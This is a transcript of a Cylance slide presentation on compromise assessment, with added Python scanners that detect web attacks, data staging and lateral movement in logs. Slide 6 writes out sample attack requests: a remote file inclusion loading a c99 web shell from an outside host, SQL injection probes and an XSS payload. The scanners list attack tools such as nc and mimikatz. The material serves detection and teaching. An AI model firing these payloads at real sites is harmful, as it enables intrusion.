
Mathematical Determination of Good and Bad Leveraging Preventative/Response Professional Services
Cylance
Corey White, VP, Professional Services





Presentation Transcript


  1. Mathematical Determination of Good and Bad Leveraging Preventative/Response Professional Services - Cylance - Corey White, VP, Professional Services

  2. PRESPONSE Professional Services

  3. Risk Does Not Equal Threat | Presponse Compromise Assessment

  4. Malware - Windows / Linux / OSX (31% of cases didn't use malware)
  • Dropper/Downloaders – phishing and waterholing malware in userspace; zero/single-day exploits that lead to...
  • Backdoor Trojan RATs – kernel-interactive service binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
  • BOTNETs – platforms for MaaS/subscription access
  • WebShells – Internet-facing server backdoor RATs (c99/r57/eval)

  5. Hacking - .day Exploits
  • Zero Day – vulnerability known only to the exploit developer, not yet to the vendor
  • ½ Day – vulnerability that is publicly known but for which no patch is yet available
  • Single Day – vulnerability that is known and patched, but the patch is not applied
  • Forever Day – vulnerability that is known and cannot be patched

  6. Hacking - Web Server/Services Exploits
  • Remote code execution (watch your .htaccess files!)
    register_globals on in PHP | require ($page . ".php");
    http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
  • SQL injection (watch your user privileges!)
    AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'";
    http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)
  • Cross Site Scripting/XSS (watch your syntax!)
    Volatile entry in echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?>
    http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
  • Username enumeration (watch your error messages!)
    Username guessing | error messages that distinguish a bad username from a bad password
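The three request patterns on this slide leave recognisable traces in a web server's access log, which is usually the first artefact reviewed in a compromise assessment. The following scanner is an added example written for this page, not code from the talk or from Cylance: it URL-decodes each request and tags it as remote file inclusion, error-based SQL injection, or reflected XSS. The log lines are constructed, and the hostnames in them are hypothetical. Note that with require($page . ".php") an attacker appends "?" to the remote URL so the ".php" suffix becomes a harmless query string; the sample RFI line includes that trailing "?".

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (hypothetical hosts, not from the original talk).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2014:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2014:10:01:07 +0000] "GET /index.php?page=http://www.ilikeyoursite.com/c99.txt? HTTP/1.1" 200 8123
10.0.0.9 - - [10/Mar/2014:10:01:09 +0000] "GET /site.asp?id=1%20and%201=convert(int,@@version) HTTP/1.1" 500 1400
10.0.0.9 - - [10/Mar/2014:10:01:11 +0000] "GET /clean.php?name_1=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.7 - - [10/Mar/2014:10:02:00 +0000] "GET /site.asp?id=42 HTTP/1.1" 200 700
"""

# Client IP, request target and status code from a combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# One pattern per slide bullet, applied to the URL-decoded request target.
PATTERNS = {
    # a parameter whose value is itself a remote URL (register_globals + require)
    "rfi": re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I),
    # boolean/error-based probes: AND/OR followed by convert(int,...), @@version, or a quoted tautology
    "sqli": re.compile(r"\b(?:and|or)\b.*(?:convert\s*\(\s*int|@@version|'\s*or\s*'|=\s*'1)", re.I),
    # script tags, javascript: URLs or inline event handlers reflected through echo
    "xss": re.compile(r"<\s*script\b|javascript:|on\w+\s*=", re.I),
}


def classify_request(url):
    """Return the list of attack categories matched by one request target."""
    decoded = unquote(url)          # %20 -> space, %3C -> '<', so encoded payloads are caught too
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan_access_log(text):
    """Return (line number, client, category, status) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue                # skip lines that are not requests (or are malformed)
        src, url, status = m.groups()
        for tag in classify_request(url):
            findings.append((lineno, src, tag, int(status)))
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The status code is kept with each finding because a 500 on an error-based SQL injection probe (the convert(int,@@version) line) tells the assessor the database actually processed the injected expression, whereas a 200 on an RFI attempt tells them the remote file was most likely fetched.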

  7. Social Engineering – Access, Behavior, and Authority
  • Sabotage
  • Phishing
  • Waterholing
  • USB "HoneyDrops" and other free hardware
  • "HelpDesk Operators"
  • "Visitors" (repairmen, janitors, pizza/flower delivery, tailgaters)
  • Subversion
  • Contractors
  • Employees

  8. Advanced Persistent Threat - Activities
  • Stage 1 - Compromise: reconnaissance; social engineering backdoors (phishing/waterholing, help desk/visitors); web site backdoors
  • Stage 2 - Exploit: privilege escalation; lateral movement; user profile abuse; remote access provisioning; services bypass/cancellation
  • Stage 3 - Control: configuration management; data targeting; data exfiltration; sabotage; subversion

  9. Most commonly seen indicators of data loss:
  • Non-standard packagers (7z, gz, RAR, PKZIP, etc.)
  • Multipart files of particular sizes (250/500 MB)
  • "Recycle"/Recycle Bin residue
  • HTTP 206 status codes on web servers
  • Non-standard file transfer services (FileZilla, FTP, WS_FTP, etc.)
  • Non-standard reverse/proxy services (HUC, PLINK, NC, SSH, etc.)
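Two of these indicators are easy to check mechanically: fixed-size archive volumes staged for pickup, and HTTP 206 (Partial Content) responses on a web server, which appear when a staged archive is pulled out in ranges. The code below is an added example for this page, not part of the talk: the first function groups archive files by directory and volume sequence and flags sets whose volumes (all but the last) share one large fixed size, as a RAR -v or 7z -v split produces; the second totals large 206 responses per client. The file listing and log lines are constructed, with hypothetical paths and addresses.

```python
import re
from collections import defaultdict

MB = 1024 * 1024

# Constructed directory listing as (path, size in bytes). Paths are hypothetical.
SAMPLE_FILES = [
    ("C:/RECYCLER/S-1-5-21-99/1.rar", 250 * MB),
    ("C:/RECYCLER/S-1-5-21-99/2.rar", 250 * MB),
    ("C:/RECYCLER/S-1-5-21-99/3.rar", 250 * MB),
    ("C:/RECYCLER/S-1-5-21-99/4.rar", 61 * MB),          # last volume is the remainder
    ("C:/Users/bob/Documents/report.docx", 2 * MB),
    ("C:/Users/bob/Downloads/tool.7z.001", 500 * MB),
    ("C:/Users/bob/Downloads/tool.7z.002", 500 * MB),
    ("C:/Users/bob/Downloads/tool.7z.003", 120 * MB),
    ("C:/Users/bob/Downloads/setup.zip", 30 * MB),       # single archive, not a volume set
]

# Archive extensions, including RAR .r00-style and 7z/zip .001-style volume suffixes.
ARCHIVE_RE = re.compile(r"\.(?:rar|r\d\d|7z|zip|gz|tgz|tar|cab)(?:\.\d{3})?$", re.I)


def archive_volume_groups(files, min_volume=200 * MB):
    """Return (directory, volume size in MB, volume count) for fixed-size multipart archive sets."""
    groups = defaultdict(list)
    for path, size in files:
        directory, _, name = path.rpartition("/")
        if not ARCHIVE_RE.search(name):
            continue
        # Replace digit runs so 1.rar/2.rar and tool.7z.001/.002 fall into one group each.
        groups[(directory, re.sub(r"\d+", "#", name))].append((name, size))
    flagged = []
    for (directory, _), members in sorted(groups.items()):
        if len(members) < 2:
            continue
        members.sort()
        body = [size for _, size in members[:-1]]   # every volume except the final remainder
        if body[0] >= min_volume and len(set(body)) == 1:
            flagged.append((directory, body[0] // MB, len(members)))
    return flagged


# Constructed web-server log lines showing ranged pulls of staged archives (hypothetical addresses).
SAMPLE_WEB_LOG = """\
203.0.113.7 - - [12/Mar/2014:02:14:01 +0000] "GET /images/banner.png HTTP/1.1" 200 48120
203.0.113.7 - - [12/Mar/2014:02:15:10 +0000] "GET /tmp/1.rar HTTP/1.1" 206 104857600
203.0.113.7 - - [12/Mar/2014:02:19:44 +0000] "GET /tmp/1.rar HTTP/1.1" 206 104857600
203.0.113.7 - - [12/Mar/2014:02:25:03 +0000] "GET /tmp/2.rar HTTP/1.1" 206 157286400
198.51.100.4 - - [12/Mar/2014:03:00:00 +0000] "GET /docs/manual.pdf HTTP/1.1" 206 20480
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')


def partial_content_pulls(text, min_bytes=50 * MB):
    """Per client: total MB served with status 206 in large ranges, and the paths pulled."""
    per_client = defaultdict(lambda: [0, set()])
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, path, status, size = m.groups()
        if status != "206" or size == "-" or int(size) < min_bytes:
            continue                # small 206s (PDF viewers, media players) are normal
        per_client[src][0] += int(size)
        per_client[src][1].add(path)
    return {src: (total // MB, sorted(paths)) for src, (total, paths) in per_client.items()}


if __name__ == "__main__":
    print(archive_volume_groups(SAMPLE_FILES))
    print(partial_content_pulls(SAMPLE_WEB_LOG))
```

The RECYCLER path in the sample is deliberate: the slide's "Recycle Bin residue" indicator and the multipart-archive indicator are usually found together, because the recycler directory is hidden from Explorer and is where staged volumes tend to be dropped.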

  10. Most commonly seen indicators of sabotage:
  • Unusual Prefetch / Recent / LNK / bash binary execution history
  • AT / cron jobs
  • Scripts
  • Services cancellation
  • User profile authority changes

  11. Most commonly seen indicators of user profile abuse:
  • Multiple user accounts on a single computer
  • One user account on multiple computers
  • Service and administrative account propagation
  • Extranet LDAP/AD account use
  • Account privilege provisioning/modifications (SuSID, MD5, Admins, etc.)
  • Local services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

  12. Most commonly seen indicators of lateral movement:
  • Access history (Windows logon types 3 network, 4 batch, 8 network cleartext, 10 remote interactive/RDP; Linux auth.log)
  • MSTSC history (.RDP, .BMC)
  • Remote job scheduling (AT, SC, WMIC, SSH)
  • Redundant and non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PuTTY, PSEXEC, *FTP, SCP)
  • Domain services history (DSGET, DSQUERY, HYENA)
  • Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
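The profile-abuse indicators on slide 11 and the lateral-movement indicators on slide 12 can be pulled from the same two Windows Security event types: 4624 (logon, with its logon type) and 4688 (process creation). The following is an added example written for this page, not Cylance's tooling: it flags an account that reaches several hosts by network or RDP logon inside a short window, hosts where more than one account has logged on, and process creations of the scheduling, domain-query and reconnaissance tools the slide lists. The events are constructed, in the flat form a SIEM export would give, with hypothetical hosts and users.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events (hypothetical hosts/users/addresses).
# id 4624 = logon with "type" (logon type) and "src" (source address);
# id 4688 = process creation with "cmd" (command line).
EVENTS = [
    {"t": "2014-03-12T01:02:00", "id": 4624, "host": "WS-ACCT01", "user": "jsmith", "type": 2, "src": "-"},
    {"t": "2014-03-12T01:05:10", "id": 4624, "host": "WS-ACCT01", "user": "svc_backup", "type": 3, "src": "10.1.1.50"},
    {"t": "2014-03-12T01:06:00", "id": 4688, "host": "WS-ACCT01", "user": "svc_backup",
     "cmd": "wmic.exe /node:WS-HR02 process call create cmd.exe"},
    {"t": "2014-03-12T01:07:30", "id": 4624, "host": "WS-HR02", "user": "svc_backup", "type": 3, "src": "10.1.1.50"},
    {"t": "2014-03-12T01:09:00", "id": 4624, "host": "FS-01", "user": "svc_backup", "type": 3, "src": "10.1.1.50"},
    {"t": "2014-03-12T01:11:45", "id": 4624, "host": "DC-01", "user": "svc_backup", "type": 10, "src": "10.1.1.50"},
    {"t": "2014-03-12T01:12:00", "id": 4688, "host": "DC-01", "user": "svc_backup",
     "cmd": "C:\\Windows\\System32\\dsquery.exe user -limit 0"},
    {"t": "2014-03-12T01:30:00", "id": 4624, "host": "WS-ACCT01", "user": "jsmith", "type": 3, "src": "10.1.1.20"},
    {"t": "2014-03-12T08:00:00", "id": 4624, "host": "FS-01", "user": "mlee", "type": 3, "src": "10.1.1.33"},
    {"t": "2014-03-12T08:00:05", "id": 4688, "host": "FS-01", "user": "mlee",
     "cmd": "C:\\Windows\\System32\\notepad.exe"},
]

REMOTE_LOGON_TYPES = {3, 10}          # network (SMB/WMI/PsExec) and RDP
LATERAL_TOOLS = {                     # executables named on slides 11 and 12
    "at.exe", "sc.exe", "wmic.exe", "psexec.exe", "net.exe", "net1.exe", "netsh.exe",
    "dsquery.exe", "dsget.exe", "fport.exe", "plink.exe", "nc.exe", "mimikatz.exe", "pwdump.exe",
}


def account_host_fanout(events, window=timedelta(minutes=30), min_hosts=3):
    """Accounts with remote logons to >= min_hosts distinct hosts within `window` (one account, many computers)."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["type"] in REMOTE_LOGON_TYPES:
            by_user[e["user"]].append((datetime.fromisoformat(e["t"]), e["host"]))
    hits = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):          # slide the window from each logon
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                hits[user] = sorted(hosts)
                break
    return hits


def hosts_with_many_accounts(events, min_accounts=2):
    """Hosts on which >= min_accounts distinct accounts have logged on (many accounts, one computer)."""
    by_host = defaultdict(set)
    for e in events:
        if e["id"] == 4624:
            by_host[e["host"]].add(e["user"])
    return {h: sorted(users) for h, users in by_host.items() if len(users) >= min_accounts}


def lateral_tool_executions(events):
    """(host, user, executable) for process creations of known scheduling/recon/credential tools."""
    out = []
    for e in events:
        if e["id"] != 4688:
            continue
        exe = e["cmd"].split()[0].rsplit("\\", 1)[-1].lower()   # strip path, keep image name
        if exe in LATERAL_TOOLS:
            out.append((e["host"], e["user"], exe))
    return out


if __name__ == "__main__":
    print(account_host_fanout(EVENTS))
    print(hosts_with_many_accounts(EVENTS))
    print(lateral_tool_executions(EVENTS))
```

In the constructed data the service account svc_backup is the one that fans out (four hosts in under seven minutes from one source address, ending with dsquery on a domain controller), which is the "service account propagation" pattern from slide 11 seen through the logon-type lens of slide 12. Thresholds are deliberately low for the sample; on a real domain they are tuned against a baseline of the account's normal host set.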

  13. Most commonly seen indicators of insider threats:
  • Unusual profile access and use history: time, host ID, application history, configuration history
  • RBAC violations
  • Other Acceptable Use Policy violations
  • Malware / PUP / PUM...

  14. Most common malware identifiers:
  • Authority – service, administrator, or user
  • Persistence – only 4 persistence mechanisms in Windows
  • Communications – only 44 netsvcs keys in Windows Services
  • Functionality – user and kernel combinations are rare
  • File System – user or system

  15. Risk Does Not Equal Threat | Presponse Compromise Assessment: issues, not indicators; focus on priorities

  16. Get Ahead of Compromise Activities
  • Monitor: persistence settings (registry keys, startup folders, scheduled jobs/tasks); service creations
  • Alert: user profile propagation; lateral movement/access; anomalous use (time/resources); service state changes (start/stop); file creations by type (RAR, BAT, VBS, SH, etc.); sinkhole communications
  • Prevent: assess and secure networks and applications; automated tasks; known PUP/PUMs; user-space execution

  17. Victimization vectors (diagram): email, social engineering, web, supply chain, direct (open ports, TCP/135), insider, candy drop

  18. Innovation Requires STARVATION

  19. WARNING: Deprogramming Required. NO signatures, NO heuristics, NO behavioral, NO sandboxing, NO dynamic detonation, NO micro-virtualization. JUST 100% pure MATH.

  20. 100% Pure Math (diagram): a spectrum from MALICIOUS to GOOD. Blacklist covers roughly 20% at the malicious end and whitelist roughly 20% at the good end; the 60%+ gap between them is the UNKNOWN, "the greylist". Existing controls placed on the diagram: behavioral analysis, sandboxing, IDS/IPS, whitelisting, server AV, email/web gateway, antivirus/HIPS, firewall.

  21. Trust the Vendor | Trust the Math

  22. Infinity Product Portfolio (timeline, June 2013 to April 2014): DETECT, SWEEP*, V-API / V-Forensics / V-Gateway / V-Helpdesk. Attributes listed across the products: browser delivery; detection of threats; silent/small footprint; detection only vs. detection with protection option; Windows agent; cloud management; free, silent; REST API over SSL; advanced threat; over 5,000 seats. Release dates shown: June 2013, October 2013, February 2014, April 2014.
